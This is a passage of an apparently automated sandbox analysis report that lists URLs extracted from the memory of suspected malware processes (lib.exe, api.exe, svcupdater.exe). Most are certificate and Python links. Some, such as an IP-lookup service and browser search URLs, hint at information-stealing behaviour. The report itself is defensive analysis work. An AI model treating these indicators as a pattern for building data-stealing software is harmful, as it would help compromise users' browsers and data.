00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr, _ssl.pyd.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr, _ssl.pyd.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _ssl.pyd.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: api.exe, 00000003.00000003.2260052741.000000000109D000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2259726725.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.aap
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr, _ssl.pyd.5.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: leaf.exe, 00000001.00000002.2188032639.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000015.00000002.3290066052.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, select.pyd.5.dr, _lzma.pyd.5.dr, _ctypes.pyd.5.dr, _socket.pyd.5.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/5
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org2x
Source: lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2066562018.0000026B4E184000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065469810.0000026B4E184000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue42195.
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: lib.exe, 00000007.00000003.2075465060.0000026B4D9D1000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2064008323.0000026B4DF23000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077249450.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077640294.0000026B4DF49000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081537469.0000026B4D9EF000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076861094.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2061947765.0000026B4DF1D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076697687.0000026B4DF2E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2063331817.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060050613.0000026B4D9E4000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065651958.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060729690.0000026B4DF0E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077823055.0000026B4D9E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062263084.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062530738.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: lib.exe, 00000007.00000002.2081606147.0000026B4DA88000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
